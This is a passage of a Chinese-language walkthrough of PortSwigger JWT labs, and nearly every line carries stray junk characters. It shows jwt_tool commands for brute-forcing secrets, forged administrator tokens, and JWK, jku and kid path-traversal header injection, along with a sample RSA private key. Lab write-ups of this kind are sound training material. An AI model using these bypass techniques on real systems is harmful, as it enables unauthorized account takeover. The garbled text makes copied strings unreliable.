e.g. -Q jwttool_46820e62fe25c10a3f5498e426a9f03a
-v, --verbose When parsing and printing, produce (slightly more) verbose output.
, s& _* Y7 U7 R9 q; m# H% _
1 O( Q8 `- z) ?/ @. S
If you don't have a token, try this one:
) v. h: W) c$ S3 E. \
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.bsSwqj2c2uI9n7-ajmi3ixVGhPUiY7jO9SUn9dm15Po& |# R6 \% E# _6 H; q% h# E- r
- v2 q& P+ q& Q* p4 A- ` Step 4:暴力猜解密钥1 I1 E/ C1 F E* d
0 E. p" f; g1 _, R' I! s3 i
#命令格式
3 l& L2 E4 A2 I3 m6 |9 C
python3 jwt_tool.py JWT_HERE -C -d dictionary.txt
9 [' q! ~# q+ r1 e
#执行示例
7 P ^, e W: \6 Q
python3 jwt_tool.py eyJraWQiOiI4M2RhOGNjMi1hZmZiLTRmZGMtYWMwYS1iMWNmMTBkNjkyZGYiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY4Nzc5NjQwMn0.IhZV-7RHTpEcQvkcZOA3knCYmQD0YUg-NFMj9fWSFjw -C -d secrets.txt6 x+ n: K L) g, p
4 R; |9 e6 [; _5 P# P8 I3 y* p
- w5 g( `6 }3 p9 j0 C 附加扩展:6 b6 T5 D( S0 s, e
#尝试破解密钥(HMAC算法)
5 ~& v7 Y5 i ?/ c
python3 jwt_tool.py JWT_HERE -C -d dictionary.txt
2 @3 N2 C( C" y) l3 K
#尝试使用已知的公钥对不对称密码(RS-,EC-,PS-)进行"密钥混淆"攻击
6 _: U( E$ q9 X V3 u
python3 jwt_tool.py JWT_HERE -K -pk my_public.pem
/ } `% K- r" T( R: ~2 P6 U. b
#尝试使用"无"算法来创建未验证的令牌
python3 jwt_tool.py JWT_HERE -A
#处理JSON Web密钥存储文件,重建公共密钥,然后测试密钥以查看验证令牌的密钥
python3 jwt_tool.py JWT_HERE -J -jw jwks.json
) t+ i+ |# |$ R8 s: K7 t# a
#生成一个新的RSA密钥对,将公钥作为JSON Web密钥存储对象注入令牌并使用私钥对令牌签名
+ Z1 J8 f/ e/ J6 }* }; p
python3 jwt_tool.py JWT_HERE -I
#欺骗远程JWKS:生成新的RSA密钥对,将提供的URL注入令牌,将公共密钥导出为JSON Web密钥存储对象(以提供的URL进行服务)并使用私钥对令牌签名
python3 jwt_tool.py JWT_HERE -S -u http://example.com/jwks.json" \, |0 A7 S4 f, v! G1 Y
Step 5:随后在网页端重新设置密钥(secret1)并重新产生的字符串
Header:' m4 F# O4 y7 [4 }# D1 F. G
$ W# L) e. y! u; K. y
eyJraWQiOiJjY2Y4Yjk3YS05NGZlLTRjN2QtOWI2MS0yNzZmMDY1NGMyZWIiLCJhbGciOiJIUzI1NiJ9
{"kid":"ccf8b97a-94fe-4c7d-9b61-276f0654c2eb","alg":"HS256"}
8 F0 N# k- R1 E1 }1 x2 N5 Z4 u& h
/ r e- T: ?; B payload(前):
! P$ U7 F2 w; K3 Z( w* Y: q# X- s/ u( H* |- d) ^ n- h( J4 {
eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY4Nzc5OTk1OX0
{"iss":"portswigger","sub":"wiener","exp":1687799959}
3 S7 g/ {) c7 F* N0 A8 L; l , Y& s5 U) d' T6 M4 t
payload(新):
7 ]' l8 O6 K( f9 q3 r( u. L) N) f& W4 p! ~$ ]$ ^
{"iss":"portswigger","sub":"administrator","exp":1687799959}
eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6ImFkbWluaXN0cmF0b3IiLCJleHAiOjE2ODc3OTk5NTl9
Signer:
E891AutpjiwkhVUDV2dZdrfGzsv5TweyIUUhT_a1Ar0
6 z9 J) y `" m# M5 H" a" h6 f4 K6 |+ R; J0 a- X% S
& Z( }- p. W- y; D1 O 最终高权限的JWT token如下:9 D# i5 A, B2 l8 Q( P2 Q6 j
, v8 I6 O7 Z& h. L3 F9 P' C eyJraWQiOiJjY2Y4Yjk3YS05NGZlLTRjN2QtOWI2MS0yNzZmMDY1NGMyZWIiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6ImFkbWluaXN0cmF0b3IiLCJleHAiOjE2ODc3OTk5NTl9.E891AutpjiwkhVUDV2dZdrfGzsv5TweyIUUhT_a1Ar01 T0 S: T. f. t; R( R/ o* L& b
, q! H- ] ]% N1 |3 _& ^( r, ~; p" H" j5 c3 L; ^3 @; m+ { ( F; C$ f4 S8 ~3 ~: k. n8 P D7 U
! C$ p' H8 w$ z7 n$ C5 e$ c0 t) [' }8 N, [9 e" J8 e S# z Step 6:访问/admin路径
, Q- b# e# d- K7 E' @6 n, ~
Step 7:调用接口删除用户完成解答
1 ~: |" G; Z5 d5 R5 X6 U( w5 ]( A2 P) U) i
- v1 _$ e2 }/ h8 @, o! T" P9 E8 d1 X + `" v& i# _0 l% u# X: U/ t$ k' ~
$ y# Y- m+ B3 {8 _: a) T8 C JWT头部注入
7 k" e5 w& z+ B' u6 \! {4 v3 w" O$ g- V. X5 T# V* T) A" a$ F 场景介绍
X7 D% F$ `8 k, Q0 h4 W$ u- ~ 如果服务器端使用一个非常脆弱的密钥,我们甚至有可能一个字符一个字符地来暴力破解这个密钥,根据JWS规范只有alg报头参数是强制的,然而在实践中JWT报头通常包含几个其他参数,以下是攻击者特别感兴趣的:
# Q& R& p# D' Q这些用户可控制的参数每个都告诉接收方服务器在验证签名时应该使用哪个密钥,下面我们将介绍如何利用这些参数来注入使用您自己的任意密钥而不是服务器的密钥签名修改过的JWT
% Y( a: r' ^$ u, q* M' T4 R3 B 注入场景1- o; g1 |8 E% l/ a. E" C
下面我们介绍如何通过JWK参数注入自签名的JWT,JWS(JSON Web Signature)规范描述了一个可选的jwk header参数,服务器可以使用该参数以jwk格式将其公钥直接嵌入令牌本身,您可以在下面的JWT head中看到具体的示例:
7 J8 f! P& D! ^% q1 z2 G2 t n% @, i5 s+ q
{
"kid": "ed2Nf8sb-sD6ng0-scs5390g-fFD8sfxG",
A2 y0 t2 v6 f( \& g" q7 Z
"typ": "JWT",
"alg": "RS256",
"jwk": {
* b3 |8 V" W- o+ f6 M9 u
"kty": "RSA",
, K. f1 B" G! x T
"e": "AQAB",
"kid": "ed2Nf8sb-sD6ng0-scs5390g-fFD8sfxG",
, U8 d0 d( R' | m; M* a& ?4 V0 s
"n": "yy1wpYmffgXBxhAUJzHHocCuJolwDqql75ZWuCQ_cb33K2vh9m"
5 F( ^. g o |
}
0 _0 i: h$ q( o1 N' u
}
理想情况下服务器应该只使用有限的公钥白名单来验证JWT签名,然而错误配置的服务器有时会使用jwk参数中嵌入的键值,您可以通过使用自己的RSA私钥对修改后的JWT进行签名,然后在jwk头中嵌入匹配的公钥来利用这种行为,Burpsuite的JWT Editor扩展提供了一个有用的功能来帮助您测试此漏洞,您可以在Burp中手动添加或修改JWT参数
靶场地址:https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-jwk-header-injection
: y4 {7 ?$ E& C5 W' E
/ I3 s/ W* ^5 P, _- @$ f: ~ Step 1:点击"ACCESS THE LAB"访问靶场
, P. u, W: B9 w3 d2 w, ?8 B+ G6 l m! P- e
Step 3:点击"My Account"登录系统
wiener:peter& f1 a, v3 X: y' ?& @
% z: I2 x9 Y- n8 ^+ B, L" y- g; h7 t! Z- a+ a+ Y ]) v
# F+ ?" w; g7 d+ G% R* y7 y Step 4:登录之后可以看到如下邮箱更新界面
( \! e0 O# q% r7 x- R) {1 A# s: G( \: E
Step 5:下面我们开始操作,不过在此之前我们得先武器化以下自己,在Burpsuite界面选择"Extender"选项卡,紧接着点击"BApp Store"安装"JWT Editor"
+ V, n [0 U" i7 k' c
- S* X. w, V& s: p 之后你可以看到如下的选项卡界面9 I% P) i6 S$ q
. l6 t' C5 P2 K0 W ]6 T v0 M% q i& s" \- Q8 R
' g3 _ u9 m# L7 f6 W/ [! ]6 }) l9 a1 Q+ h Step 6:生成一个新的RSA密钥! w- E i) Y u6 U, _+ x: ^0 \+ Z
; B2 Q0 Z- d( {9 L
{
"p": "8J0fgpxQpZOvPGb2rRsJB6Bh0lgvxRtp_Ilc7NmpI3UgEUiArSey091pT3X6lIPRZLdMf_eeYo_PWh5aq79Ps_xoZHtAz4VrR9sR8tCkND-z0KKBmopkUrowJie368xoWDU53P-4qxEfCfqPPxoZZRzhE7cse0PUVayNAJC01FU",
"kty": "RSA",
9 m& N: W& `# n
"q": "1zMkdJNLYEdZYvZ31B15CmCfI9dOGEpn6lyXOEBPsqrP554x_8dXZnXSHbybiYyeLgl6i_JubJBqjeSAejwHh9v-e3-R9-7Dgg4lB_OUNqsg7yM3mcpZn7IHeGVKj9BjhigWsbUXFuwM1iEDK4TDmTV4-tO9UMsIBQA1SFlUTA8",
2 c. K- _# Z# w" p1 |
"d": "Ayw2AASn_yn6EwjqCts6_gP6NZ9BlNhCG1iuDTX9h_AGWYBtUepdgp4CaM098ZyjH2Da3RvonFVlTOwHTgVAdkb2eWqeMejMjUji3cKIQRU_r0UeY3C4q8BBuWjwzF7ZTeVDgbx05NfeUW0LwWE3mFBuPDy6tmvYdekcs8Ft7GDmU_ToPZaGnMoEKzVlMyDb82LgkB7qWw2H4UoXHWR0l_RS90gTjkJzMc4Fmu4CoPfmqw8jLnGgq8GhAzpecc-VLvqel3tSY0fKqF5Y3U2SooL27vJJxX0kLgHVbcTNvCcS8XZArdhWTekV923jtspoNDYn5HfhAlLglCcwQcOSYQ",
6 p) ?$ F: t+ I* F+ E0 A& k
"e": "AQAB",
"kid": "fa018615-0392-4d15-89bb-a2c637d9adbd",
0 `; u) z$ ] Y
"qi": "XO3HEFj8PCxFz4DIw0djHjTrW4Krm-Oim-U4bmuEdmPDKKTIYYvkPVoSRR-4kCHkCx2aDsraUbNkTyEYC4dRUbnWl6xr2HxaLZIsxOglYsa939l_m6NXSzttAGrPpWqoURT7t6ihSmBnGDJDsMS3c1gWJKZsAYkeXy5lI2IhGks",
"dp": "0gfldIZsY0w5_9jE5LAfvreCDDGMaVsXtihVpC4PVXMs7clDAWMQ152DCqiqdi9mfar_LQkCCXkM_9ZVQWw675qZqXRpS3xj_BI_ZZw4aZ9dn_XqefLpxcjetL-g7US9pJm5i67xDOpiFLzRg7yNhFSkKCiRvHumAq8fWen23w0",
"dq": "QcZI6zSmAjxsjrnkcDm96DUWDv9cyEHdtx0rvy6w7VwWBaYthA8qoI98dEhUhdsr8chF44Zqx9XwK4Re3H2Ck7zi8F5SgCRDL3ohSWfisj7l5xGtidz2PcBNVjgnbQN1l-ii3xgJgaEOX1hhvqhqnGZins-e-pXD0rt4ja93-3M",
2 n \$ ~6 W* t7 o W. s6 K5 u
"n": "ykQHB6Jelehm2eVfkb-2mSTpfODsGlthhS0sTLX5geGwsQCz4gnRbXPN5gOsCpqUbJH9gDE80q262XuS8DNrdmTLTPjuM4wRc-ghh9GvOCgJGBtO1PIVCTIsPmwhMra0eykwj246GReyoDcUhreG2yZ8rg-tHIcxPyWBtdKY2tubM6-YLk5gVLcuHRL25Fn_I5NghQbyzmISbulJ1CMq5WU-h9RA8IkYhVcrsP8Y1E2dc4fagKn5Tp60bUkjCcqIMAKouI-CX86mF0k3cSd340KuUXuf2vIo_yWMhZjFkAxj-gBn4eO3l2qZgyGkkHMn0HL8RSDzdG-BSBgNYoWs-w"
3 d% s& [, U l0 w! Q* t7 e6 @
}
7 k- e& e% C5 i# _" i% ? + ?) K' Y: W9 B8 n. c
* e% l/ e/ }6 R! z+ A1 p4 i" }# s Step 7:刷新页面拦截到请求并将请求发送到Repeat模块5 o2 ?' f: m \0 a* Y: I
! P+ G* x0 i* Z8 i4 C! K, ` a4 P$ G/ U" W& D: B
f- H+ C" I$ p! VStep 8:在Repeat模块,我们切换到JSON Web Token选项卡,修改JWT的有效负载将sub内容修改为administrator
/ y& H' Q( ^; z U. H . {% y/ Y2 S& E1 v% r F
Step 9:点击"Attack",然后选择"Embedded JWK",出现提示时选择您新生成的RSA密钥
/ g+ z: ~( w5 m t, { E
9 @8 Z; R9 V$ k: c3 B! k8 c- x
Step 10:之后成功越权
2 N7 o: o: a6 H$ `4 j. Q
' o- }7 f* ]4 u# f/ e- _3 T- U @6 N Step 11:调用敏感操作接口删除carlos用户完成解题. `5 B) P; J) D6 f' l' W) |" y
8 ]0 B/ z3 w2 \+ M6 ^ 2 d. b/ I8 I- H& R- W( F
: W' \+ X! \, J0 v4 {9 F# S3 J7 T2 |6 f
9 k9 r0 t+ M! X# ?6 E6 E : d% y( z1 D. G" x
7 o& u+ [9 G1 _( e/ V, {; J+ j
5 X+ y2 j2 Z: Z$ R9 s& }) c) V" m- _ 注入场景2; J* r# Y" w! g e
& G9 d0 X6 n# Q+ o8 @. C5 |1 @; i' E8 J- u; `( ^ 有些服务器可以使用jku(jwk Set URL)头参数来引用包含密钥的JWK集,而不是直接使用JWK头参数来嵌入公钥,当验证签名时,服务器从这个URL获取相关的密钥,这里的JWK集其实是一个JSON对象,包含一个代表不同键的JWK数组,下面是一个简单的例子:
5 M# ^1 D9 L c6 T! u! f1 i* e" K0 r5 d% C4 u7 }9 c
{
"keys": [
. W+ X: O3 [+ m1 e5 L' o, z. D2 O
{
"kty": "RSA",
"e": "AQAB",
"kid": "75d0ef47-af89-47a9-9061-7c02a610d5ab",
"n": "o-yy1wpYmffgXBxhAUJzHHocCuJolwDqql75ZWuCQ_cb33K2vh9mk6GPM9gNN4Y_qTVX67WhsN3JvaFYw-fhvsWQ"
},
{
"kty": "RSA",
( E( p4 V! @* Q. E( Y
"e": "AQAB",
"kid": "d8fDFo-fS9-faS14a9-ASf99sa-7c1Ad5abA",
"n": "fc3f-yy1wpYmffgXBxhAUJzHql79gNNQ_cb33HocCuJolwDqmk6GPM4Y_qTVX67WhsN3JvaFYw-dfg6DH-asAScw"
}
]
}: s/ P) r* e2 K1 O X& ]
JWK集合有时会通过一个标准端点公开,比如:/.well-known/jwks.json,更安全的网站只会从受信任的域获取密钥,但有时您可以利用URL解析差异来绕过这种过滤,下面我们通过一个靶场来实践以下
6 s* W+ V& h+ p) q1 t& o! N
靶场地址:https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-jku-header-injection
; f: {0 {2 B2 A; ?: A* S: B 6 X6 m; Y4 U% k% Z- @
- K& {$ H/ O6 w
' G+ W) v0 E" N( }7 N( k
Step 1:首先点击上方的"ACCESS THE LAB"选项卡进入实验环境4 g" |. H/ X) Y! M- b8 H4 p
$ I6 p3 F; G, Y$ A
Step 2:登录系统
wiener:peter
' s3 ^/ W" P' N
3 O F8 _7 }6 k5 K: S7 p Step 3:随后你会看到一个用户邮箱更新的表单 B3 @/ n; O$ F& T1 H& z) t
9 M+ L3 ? u# O2 [- Q% n4 x1 i: D# `# A+ P5 l1 B! G( [1 _- d 4 v* m* l1 l3 g: X$ K' @2 \2 v. O: V6 `
+ _6 D) E! e7 l# j Step 4:使用burpsuite生成一个新的RSA密钥
% a' M0 q* k8 q& N( Y" k. s
{
/ R9 H7 I3 J9 t8 _
"p": "8J0fgpxQpZOvPGb2rRsJB6Bh0lgvxRtp_Ilc7NmpI3UgEUiArSey091pT3X6lIPRZLdMf_eeYo_PWh5aq79Ps_xoZHtAz4VrR9sR8tCkND-z0KKBmopkUrowJie368xoWDU53P-4qxEfCfqPPxoZZRzhE7cse0PUVayNAJC01FU",
"kty": "RSA",
"q": "1zMkdJNLYEdZYvZ31B15CmCfI9dOGEpn6lyXOEBPsqrP554x_8dXZnXSHbybiYyeLgl6i_JubJBqjeSAejwHh9v-e3-R9-7Dgg4lB_OUNqsg7yM3mcpZn7IHeGVKj9BjhigWsbUXFuwM1iEDK4TDmTV4-tO9UMsIBQA1SFlUTA8",
"d": "Ayw2AASn_yn6EwjqCts6_gP6NZ9BlNhCG1iuDTX9h_AGWYBtUepdgp4CaM098ZyjH2Da3RvonFVlTOwHTgVAdkb2eWqeMejMjUji3cKIQRU_r0UeY3C4q8BBuWjwzF7ZTeVDgbx05NfeUW0LwWE3mFBuPDy6tmvYdekcs8Ft7GDmU_ToPZaGnMoEKzVlMyDb82LgkB7qWw2H4UoXHWR0l_RS90gTjkJzMc4Fmu4CoPfmqw8jLnGgq8GhAzpecc-VLvqel3tSY0fKqF5Y3U2SooL27vJJxX0kLgHVbcTNvCcS8XZArdhWTekV923jtspoNDYn5HfhAlLglCcwQcOSYQ",
"e": "AQAB",
) [ h m. m6 k3 z, k9 t
"kid": "fa018615-0392-4d15-89bb-a2c637d9adbd",
; a) q0 H( e1 R( A8 h
"qi": "XO3HEFj8PCxFz4DIw0djHjTrW4Krm-Oim-U4bmuEdmPDKKTIYYvkPVoSRR-4kCHkCx2aDsraUbNkTyEYC4dRUbnWl6xr2HxaLZIsxOglYsa939l_m6NXSzttAGrPpWqoURT7t6ihSmBnGDJDsMS3c1gWJKZsAYkeXy5lI2IhGks",
"dp": "0gfldIZsY0w5_9jE5LAfvreCDDGMaVsXtihVpC4PVXMs7clDAWMQ152DCqiqdi9mfar_LQkCCXkM_9ZVQWw675qZqXRpS3xj_BI_ZZw4aZ9dn_XqefLpxcjetL-g7US9pJm5i67xDOpiFLzRg7yNhFSkKCiRvHumAq8fWen23w0",
4 D0 V4 p8 p0 w6 V; j* N: Q, q) Q' @
"dq": "QcZI6zSmAjxsjrnkcDm96DUWDv9cyEHdtx0rvy6w7VwWBaYthA8qoI98dEhUhdsr8chF44Zqx9XwK4Re3H2Ck7zi8F5SgCRDL3ohSWfisj7l5xGtidz2PcBNVjgnbQN1l-ii3xgJgaEOX1hhvqhqnGZins-e-pXD0rt4ja93-3M",
& K- Y. ?7 j# N0 ^4 U
"n": "ykQHB6Jelehm2eVfkb-2mSTpfODsGlthhS0sTLX5geGwsQCz4gnRbXPN5gOsCpqUbJH9gDE80q262XuS8DNrdmTLTPjuM4wRc-ghh9GvOCgJGBtO1PIVCTIsPmwhMra0eykwj246GReyoDcUhreG2yZ8rg-tHIcxPyWBtdKY2tubM6-YLk5gVLcuHRL25Fn_I5NghQbyzmISbulJ1CMq5WU-h9RA8IkYhVcrsP8Y1E2dc4fagKn5Tp60bUkjCcqIMAKouI-CX86mF0k3cSd340KuUXuf2vIo_yWMhZjFkAxj-gBn4eO3l2qZgyGkkHMn0HL8RSDzdG-BSBgNYoWs-w"
+ H$ ]8 W6 M" Z; f# u
}; a" U: a0 H6 Q; F
. S3 v6 M o0 c , d, q2 H! x' p! T. ]4 N" a) y7 [
9 U) r; h9 j0 G3 v7 `& D( d' ~. f4 S& t# |8 D: L% P# M8 h) J Step 5:发送请求到repeat
( I1 ?* e4 r! b G$ }
Step 6:复制公钥作为JWK' B8 Y% L4 o4 i# U: T6 G0 T
' }8 U4 j/ P4 ~( m& o
{
"kty": "RSA",
3 i I% V" T9 z* q
"e": "AQAB",
' v* b8 \' z' F& }7 T! C/ D2 ~/ r
"kid": "fa018615-0392-4d15-89bb-a2c637d9adbd",
"n": "ykQHB6Jelehm2eVfkb-2mSTpfODsGlthhS0sTLX5geGwsQCz4gnRbXPN5gOsCpqUbJH9gDE80q262XuS8DNrdmTLTPjuM4wRc-ghh9GvOCgJGBtO1PIVCTIsPmwhMra0eykwj246GReyoDcUhreG2yZ8rg-tHIcxPyWBtdKY2tubM6-YLk5gVLcuHRL25Fn_I5NghQbyzmISbulJ1CMq5WU-h9RA8IkYhVcrsP8Y1E2dc4fagKn5Tp60bUkjCcqIMAKouI-CX86mF0k3cSd340KuUXuf2vIo_yWMhZjFkAxj-gBn4eO3l2qZgyGkkHMn0HL8RSDzdG-BSBgNYoWs-w"
5 V) M" E. b+ k4 A4 m% u! N
}3 Z% _) [- T C) U& |
8 y# z j: B/ w9 m+ ^
6 A- g4 M- r0 I5 Q( P6 m0 _7 o6 } Step 7:在题目中选择"Go eo exploit server",然后加上key头并保存到exploit的body中
{
"keys": [
5 R" O8 C1 F1 L- C
{
$ H4 F6 P$ x n; {0 D
"kty": "RSA",
"e": "AQAB",
$ i5 z, {: Q! X' o# @+ `
"kid": "fa018615-0392-4d15-89bb-a2c637d9adbd",
"n": "ykQHB6Jelehm2eVfkb-2mSTpfODsGlthhS0sTLX5geGwsQCz4gnRbXPN5gOsCpqUbJH9gDE80q262XuS8DNrdmTLTPjuM4wRc-ghh9GvOCgJGBtO1PIVCTIsPmwhMra0eykwj246GReyoDcUhreG2yZ8rg-tHIcxPyWBtdKY2tubM6-YLk5gVLcuHRL25Fn_I5NghQbyzmISbulJ1CMq5WU-h9RA8IkYhVcrsP8Y1E2dc4fagKn5Tp60bUkjCcqIMAKouI-CX86mF0k3cSd340KuUXuf2vIo_yWMhZjFkAxj-gBn4eO3l2qZgyGkkHMn0HL8RSDzdG-BSBgNYoWs-w"
}
3 D, h% o) D. a. D9 ]. C
]
}
- Z2 i; |8 i8 j' G6 ^# z; j
0 Q( h6 m: r) m" p" w0 v
Step 8:然后切换至repeat的"JSON Web Token"界面,将kid修改成自己生成的JWK中的kid值,将jku的值改为exploit
7 |2 d; I2 ~: m" H4 q. M ( z! g0 D+ m0 z" B
( i1 p2 J) y2 K, n* m. C5 O
8 ]- j- U% V3 {: d Step 9:切换sub为administrator( H' ?" ^$ J- c! M1 g: G" v
0 ]+ b, c' L) L5 ~ h- x- z' `$ S & K. _1 [; j! t' M8 `. g2 g
Step 10:点击下面的sign,选择Don’t modify header模式, j# q8 C: i9 U# {
! {9 z2 Y* h0 [0 y$ ]9 ]$ |6 e' i4 Z0 ]; g
Step 11:更改请求路径发送请求成功越权
4 F B8 p( s% o+ A; H' W+ T7 W6 J% f" I 5 ~2 {) I8 _% y6 Z( c+ u4 ^5 w8 M) }
/ e( ~3 c X( a3 m! Z2 P3 FStep 12:请求敏感路径删除carlos用户: v- u0 }' b, Z0 B7 I& X3 _8 ] ^
3 x8 v, z* u* n6 V$ @
6 m- |; _5 r- Z3 ?8 BStep 13:成功解题& G& _+ ^( K8 b+ U. Q
+ T9 [& [6 R- }
" ?1 O ~3 C+ V # 注入场景30 d- J8 J0 M6 b# X5 C _) e
& t& k& W# a! D |: ?U6 x& N6 l6 F$ P 服务器可能使用几个密钥来签署不同种类的数据,因此JWT的报头可能包含kid(密钥id)参数,这有助于服务器在验证签名时确定使用哪个密钥,验证密钥通常存储为一个JWK集,在这种情况下服务器可以简单地查找与令牌具有相同kid的JWK,然而JWS规范没有为这个ID定义具体的结构——它只是开发人员选择的任意字符串,例如:它们可能使用kid参数指向数据库中的特定条目,甚至是文件的名称,如果这个参数也容易受到目录遍历的攻击,攻击者可能会迫使服务器使用其文件系统中的任意文件作为验证密钥,例如:2 O# x* x( `8 j
{
/ T$ y H3 }: k9 X8 G
"kid": "../../path/to/file",
"typ": "JWT",
"alg": "HS256",
"k": "asGsADas3421-dfh9DGN-AFDFDbasfd8-anfjkvc"
& c. \, {# k! l1 k# B/ H- Z" `
}$ o- i; z: \( y+ }2 `
( d G3 J: `4 f; |
如果服务器也支持使用对称算法签名的jwt就会特别危险,在这种情况下攻击者可能会将kid参数指向一个可预测的静态文件,然后使用与该文件内容匹配的秘密对JWT进行签名,从理论上讲您可以对任何文件这样做,但是最简单的方法之一是使用/dev/null,这在大多数Linux系统上都存在,由于这是一个空文件,读取它将返回一个空字符串,因此用空字符串对令牌进行签名将会产生有效的签名
( `7 C9 L( q$ Y/ e2 @* I, i7 n
靶场地址:https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-kid-header-path-traversal) m) V. `& X- k+ D: G' \
Step 1:点击上方"Access The Lab"进入靶场
/ E) \7 m$ {& E- o: ~4 `: c
: ?: u [" r! D, C; ?7 a4 A8 H$ a Step 2:登录靶场/ F. w Q4 u; f. b2 @
* u. d; x( n* ~8 z0 T/ {, T+ R' s( I ' S, H3 |+ H' n* G6 U
z( L8 D- x# c/ z$ Q% F Step 3:登录后进入到如下邮箱更新界面0 T/ q& ^ d1 x9 q6 s
9 O. s9 S. S' N! go. C8 \- g* w% ~
: m. s# L0 d4 a6 ~ Y; ~1 T Step 4:使用burpsuite的插件生成一个对称密钥(Symmetric Key)并将k的值修改为"AA=="即为null
{
"kty": "oct",
" J P% a3 C9 u) e% N; G
"kid": "38576880-33b7-4446-ade4-f1a78bb6d5c2",
"k": "AA=="
7 r6 K& k* A: @" P# w
}) o6 N! p" R* _0 {
, y [( P! k @9 `3 X - _9 N6 Y* N$ y& ]. C/ X
% A9 q( p, p% V Step 5:拦截一个请求将其发送到repeat模块* G; I- L# F4 u% o( A' K
+ W; C' T3 U i9 q2 U+ B( f7 `
Step 6:此时直接访问/admin——提示"401 Unauthorized"
2 m% e1 H$ ~# T 7 h% W+ ]3 |5 e' D8 R
; x% X( ~! f8 bStep 7:在JSON Web Token界面中修改kid值和sub进行目录遍历,这里的"/dev/null"文件名与"AA=="一致都为null,对称密钥,所以可以成功绕过; w" q- w( i) h3 Z- F+ @4 o
; |4 P1 x1 k+ x
{
( S0 K, Z) J3 C% `
"kid": "../../../../../../../dev/null",
"alg": "HS256"
8 Z8 @/ _6 O6 F& j
}. x p* @4 I2 E* J
! D7 n& f' k, V/ `
5 p3 G2 l1 D1 W+ [! U. ]) ~$ o% nStep 8:点击sign选择OCT8 的密钥攻击0 Y" ~* |0 |) \4 b9 m6 ]9 d! F
( L0 ^) q' p0 H! I
Step 9:成功越权) Q+ O7 e0 i1 n. Z4 r3 C
2 i/ m* d6 S4 ^/ D! G
Step 10:调用敏感接口删除carlos用户完成解题
: g+ O$ W1 M( {6 _0 H1 A$ u, U1 X6 X6 w- t- n4 k& R+ U+ n * }( K& b4 i2 R* W* h$ W' p
, }8 d5 G4 }- O) R0 B6 N5 y; {4 g 4 X. x' `- G8 g+ q
JWT算法混淆
$ o8 Y7 X8 S5 l& K) Z! |( O: A' G' d# Z2 `3 g 算法混淆
算法混淆攻击(也称为密钥混淆攻击)是指攻击者能够迫使服务器使用不同于网站开发人员预期的算法来验证JSON web令牌(JWT)的签名,这种情况如果处理不当,攻击者可能会伪造包含任意值的有效jwt而无需知道服务器的秘密签名密钥
JWT可以使用一系列不同的算法进行签名,其中一些,例如:HS256(HMAC+SHA-256)使用"对称"密钥,这意味着服务器使用单个密钥对令牌进行签名和验证,显然这需要像密码一样保密 }5 D- U# O9 M9 Z# D5 u8 W+ n5 v
1 E! Q" b7 z5 x6 i0 `
其他算法,例如:RS256(RSA+SHA-256)使用"非对称"密钥对,它由一个私钥和一个数学上相关的公钥组成,私钥用于服务器对令牌进行签名,公钥可用于验证签名,顾名思义,私钥必须保密,但公钥通常是共享的,这样任何人都可以验证服务器发出的令牌的签名
: {; H- L0 |1 \, x2 g# O, t, v+ h4 ~$ | y! Q . v9 }/ O" ]% i' d. K$ H ?
混淆攻击. x4 k' q( B- e1 ~
! T. q- N H9 m: ^4 p- T& [8 \. C* }! [ 算法混乱漏洞通常是由于JWT库的实现存在缺陷而导致的,尽管实际的验证过程因所使用的算法而异,但许多库都提供了一种与算法无关的方法来验证签名,这些方法依赖于令牌头中的alg参数来确定它们应该执行的验证类型,下面的伪代码显示了一个简单的示例,说明了这个泛型verify()方法在JWT库中的声明:
; y8 v, b( o6 ]$ C7 G6 K: ^, Y* n5 I5 M% Z
function verify(token, secretOrPublicKey){
" ]+ }: }6 H2 f
algorithm = token.getAlgHeader();
$ [& n# A' G( q/ K- o/ `
if(algorithm == "RS256"){
, [2 p+ ?$ m& M9 M
// Use the provided key as an RSA public key
2 v- Y; J, c. H+ k5 r
} else if (algorithm == "HS256"){
// Use the provided key as an HMAC secret key
% s8 v- Y* A5 m' {
}
}7 a( `+ A' T C* k
使用这种方法的网站开发人员认为它将专门处理使用RS256这样的非对称算法签名的JWT时,问题就出现了,由于这个有缺陷的假设他们可能总是传递一个固定的公钥给方法,如下所示:
0 S# g7 e6 [ C- I+ E" Q" `& s9 x/ o3 y2 t8 d
publicKey = <public-key-of-server>;
token = request.getCookie("session");
verify(token, publicKey);
在这种情况下如果服务器接收到使用对称算法(例如:HS256)签名的令牌,库通用verify()方法会将公钥视为HMAC密钥,这意味着攻击者可以使用HS256和公钥对令牌进行签名,而服务器将使用相同的公钥来验证签名(备注:用于签署令牌的公钥必须与存储在服务器上的公钥完全相同,这包括使用相同的格式(如X.509 PEM)并保留任何非打印字符,例如:换行符,在实践中您可能需要尝试不同的格式才能使这种攻击奏效)
攻击流程简易视图如下:+ t! K t! k6 {5 v% J: M7 j
6 M2 b3 t# l( v% F! p- c' F
攻击演示
4 V% u3 c+ u2 G# C8 U: o9 b4 t7 i9 s: d3 e, } 靶场地址:https://portswigger.net/web-security/jwt/algorithm-confusion/lab-jwt-authentication-bypass-via-algorithm-confusion
3 W/ s/ x+ r. h/ P1 t$ ~- M* \3 j4 m0 F" \
$ q8 a! t: n- x% i& L9 H Step 1:点击"Access the lab"访问靶场
# ?7 C ~; r k 3 \. c6 m" X0 U3 l9 @4 I0 m a9 _
2 S1 d' Z; H4 n1 O* F! t/ A Step 2:使用账户密码登录1 M9 N0 @$ ?( p& V) ~* }0 q
6 X9 `+ {# [% O0 d" |1 v2 o! F
) K2 \2 [& x: |3 F' ]) s Step 3:登录之后进入到用户邮箱更新操作界面
( U' `! d, {/ t" l+ e4 y$ H5 W6 @6 k& q 5 a+ N8 Y; h3 G9 |" A. d
